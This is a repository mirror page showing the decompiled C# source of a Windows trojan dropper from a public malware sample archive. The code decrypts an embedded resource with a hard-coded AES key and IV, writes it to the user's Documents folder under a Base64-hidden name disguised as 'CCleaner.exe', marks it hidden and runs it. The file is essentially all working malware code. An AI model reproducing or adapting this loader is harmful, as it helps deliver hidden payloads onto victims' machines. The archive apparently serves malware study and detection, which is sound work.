ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 09:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/R/Trojan.Win32.Reconyc.egaj-1913b79aa5e711f9b09855b78533e4a244c7519aa2c27cf5c2237125c01ea156/tGtrlEBXHRXTfwxTUdB.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

87 lines
2.5 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: tGtrlEBXHRXTfwxTUdB
// Assembly: Test, Version=3.11.28.5593, Culture=neutral, PublicKeyToken=null
// MVID: B4C1EDE9-D91B-4814-A873-BD5883EACB0E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Reconyc.egaj-1913b79aa5e711f9b09855b78533e4a244c7519aa2c27cf5c2237125c01ea156.exe
using Microsoft.VisualBasic.CompilerServices;
using My;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Security.Cryptography;
using System.Text;
public class tGtrlEBXHRXTfwxTUdB
{
[STAThread]
public static void Main()
{
try
{
byte[] data = tGtrlEBXHRXTfwxTUdB.PTY((byte[]) new ResourceManager("PYK", Assembly.GetExecutingAssembly()).GetObject("KiR"));
string str = MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\";
if (File.Exists(str + Encoding.UTF8.GetString(Convert.FromBase64String("Q0NsZWFuZXIuZXhl"))))
File.Delete(str + Encoding.UTF8.GetString(Convert.FromBase64String("Q0NsZWFuZXIuZXhl")));
MyProject.Computer.FileSystem.WriteAllBytes(str + Encoding.UTF8.GetString(Convert.FromBase64String("Q0NsZWFuZXIuZXhl")), data, false);
File.SetAttributes(str + Encoding.UTF8.GetString(Convert.FromBase64String("Q0NsZWFuZXIuZXhl")), FileAttributes.Hidden);
Process.Start(str + Encoding.UTF8.GetString(Convert.FromBase64String("Q0NsZWFuZXIuZXhl")));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Process.GetCurrentProcess().Kill();
ProjectData.ClearProjectError();
}
Process.GetCurrentProcess().Kill();
}
public static byte[] PTY(byte[] Dot)
{
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
rijndaelManaged.IV = new byte[16]
{
(byte) 1,
(byte) 2,
(byte) 3,
(byte) 4,
(byte) 5,
(byte) 6,
(byte) 7,
(byte) 8,
(byte) 9,
(byte) 1,
(byte) 2,
(byte) 3,
(byte) 4,
(byte) 5,
(byte) 6,
(byte) 7
};
rijndaelManaged.Key = new byte[16]
{
(byte) 7,
(byte) 6,
(byte) 5,
(byte) 4,
(byte) 3,
(byte) 2,
(byte) 1,
(byte) 9,
(byte) 8,
(byte) 7,
(byte) 6,
(byte) 5,
(byte) 4,
(byte) 3,
(byte) 2,
(byte) 1
};
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(Dot, 0, Dot.Length);
}
}
}
Reference in New Issue View Git Blame Copy Permalink